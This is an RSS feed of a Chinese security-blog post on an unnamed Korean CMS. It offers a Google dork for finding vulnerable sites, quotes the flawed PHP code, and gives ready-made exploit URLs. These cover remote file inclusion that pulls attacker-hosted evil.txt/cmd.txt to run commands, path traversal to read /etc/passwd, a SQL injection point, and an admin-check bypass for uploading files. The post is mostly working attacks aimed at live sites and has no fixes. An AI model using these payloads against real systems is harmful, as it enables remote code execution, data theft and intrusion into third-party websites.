<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>0x50sec.org &#187; rfi</title>
	<atom:link href="http://www.0x50sec.org/tag/rfi/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.0x50sec.org</link>
	<description>Focus on web security!</description>
	<lastBuildDate>Fri, 13 Jan 2012 09:23:52 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.1</generator>
		<item>
		<title>韩国某cms远程包含、注射、文件泄漏、上传等多个漏洞</title>
		<link>http://www.0x50sec.org/%e9%9f%a9%e5%9b%bd%e6%9f%90cms%e8%bf%9c%e7%a8%8b%e5%8c%85%e5%90%ab%e3%80%81%e6%b3%a8%e5%b0%84%e3%80%81%e6%96%87%e4%bb%b6%e6%b3%84%e6%bc%8f%e3%80%81%e4%b8%8a%e4%bc%a0%e7%ad%89%e5%a4%9a%e4%b8%aa/</link>
		<comments>http://www.0x50sec.org/%e9%9f%a9%e5%9b%bd%e6%9f%90cms%e8%bf%9c%e7%a8%8b%e5%8c%85%e5%90%ab%e3%80%81%e6%b3%a8%e5%b0%84%e3%80%81%e6%96%87%e4%bb%b6%e6%b3%84%e6%bc%8f%e3%80%81%e4%b8%8a%e4%bc%a0%e7%ad%89%e5%a4%9a%e4%b8%aa/#comments</comments>
		<pubDate>Thu, 17 Jun 2010 06:54:52 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[漏洞代码]]></category>
		<category><![CDATA[CMS]]></category>
		<category><![CDATA[exp]]></category>
		<category><![CDATA[rfi]]></category>

		<guid isPermaLink="false">http://www.0x50sec.org/?p=909</guid>
		<description><![CDATA[来源:0x50sec.org 无意中发现的，名字未知，版本不详，问题一堆 Google Dork: inurl:bbs_sun/board.php board.php文件内容如下: &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211; &#60;? if(!$admin) $pgUp .= &#8220;../&#8221;; else if($admin==&#8217;N') $pgUp .= &#8220;&#8221;; include $pgUp.&#8221;inc/dbconn.php&#8221;; include $pgUp.&#8221;bbs_sun/config.php&#8221;; ?&#62; &#60;link href=&#8221;&#60;?=$skinSrc?&#62;/style.css&#8221; rel=&#8221;stylesheet&#8221; type=&#8221;text/css&#8221;&#62; &#60;? if($mode == &#8220;list&#8221;) include ($skinSrc.&#8221;/list.php&#8221;); else if($mode == &#8220;write&#8221; &#124;&#124; $mode == &#8220;modify&#8221; &#124;&#124; $mode == &#8220;reply&#8221;) include ($skinSrc.&#8221;/write.php&#8221;); else if($mode == &#8220;view&#8221;) include ($skinSrc.&#8221;/view.php&#8221;); else if($mode == [...]]]></description>
			<content:encoded><![CDATA[<p>来源:0x50sec.org</p>
<p>无意中发现的，名字未知，版本不详，问题一堆</p>
<p>Google Dork: inurl:bbs_sun/board.php</p>
<p>board.php文件内容如下:</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;<br />
&lt;?<br />
if(!$admin) $pgUp .= &#8220;../&#8221;;<br />
else if($admin==&#8217;N') $pgUp .= &#8220;&#8221;;</p>
<p>include $pgUp.&#8221;inc/dbconn.php&#8221;;<br />
include $pgUp.&#8221;bbs_sun/config.php&#8221;;<br />
?&gt;</p>
<p>&lt;link href=&#8221;&lt;?=$skinSrc?&gt;/style.css&#8221; rel=&#8221;stylesheet&#8221; type=&#8221;text/css&#8221;&gt;<br />
&lt;?<br />
if($mode == &#8220;list&#8221;) include ($skinSrc.&#8221;/list.php&#8221;);<br />
else if($mode == &#8220;write&#8221; || $mode == &#8220;modify&#8221; || $mode == &#8220;reply&#8221;) include ($skinSrc.&#8221;/write.php&#8221;);<br />
else if($mode == &#8220;view&#8221;) include ($skinSrc.&#8221;/view.php&#8221;);<br />
else if($mode == &#8220;delete&#8221; || $mode == &#8220;ment_delete&#8221;) include ($skinSrc.&#8221;/delete.php&#8221;);<br />
?&gt;<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p><span id="more-909"></span></p>
<p>此处存在远程文件包含漏洞</p>
<p>EXP:</p>
<p>http://xxxx.kr/bbs_sun/board.php?admin=0x50sec.org&#038;pgUp=http://www.0x50sec.org/evil.txt?</p>
<p>board.php?admin=0x50sec.org&amp;pgUp=http://www.0x50sec.org/evil.txt?&amp;skinSrc=http://www.0x50sec.org/cmd.txt?&amp;cmd=id&amp;mode=view</p>
<p>有的含有download.php文件，对file变量和bname变量都没有进行必要的检查，导致文件泄漏漏洞:</p>
<p>EXP:</p>
<p>http://xxxx.kr/s_board_text/download.php?file=../../../../../etc/passwd&#038;bname=../</p>
<p>mode变量为view时,有的版本对number变量没有过滤导致SQL注射漏洞</p>
<p>mode=view&amp;number=</p>
<p>mode变量为write时,有的版本对管理权限的验证存在问题可以被绕过，从而可以发布文章和上传文件。</p>
<p>打开一条记录，将mode=view直接改为write就可以上传了。</p>
<p>可能还存在其他的问题比如文件删除等，懒得看了。</p>
]]></content:encoded>
			<wfw:commentRss>http://www.0x50sec.org/%e9%9f%a9%e5%9b%bd%e6%9f%90cms%e8%bf%9c%e7%a8%8b%e5%8c%85%e5%90%ab%e3%80%81%e6%b3%a8%e5%b0%84%e3%80%81%e6%96%87%e4%bb%b6%e6%b3%84%e6%bc%8f%e3%80%81%e4%b8%8a%e4%bc%a0%e7%ad%89%e5%a4%9a%e4%b8%aa/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
	</channel>
</rss>

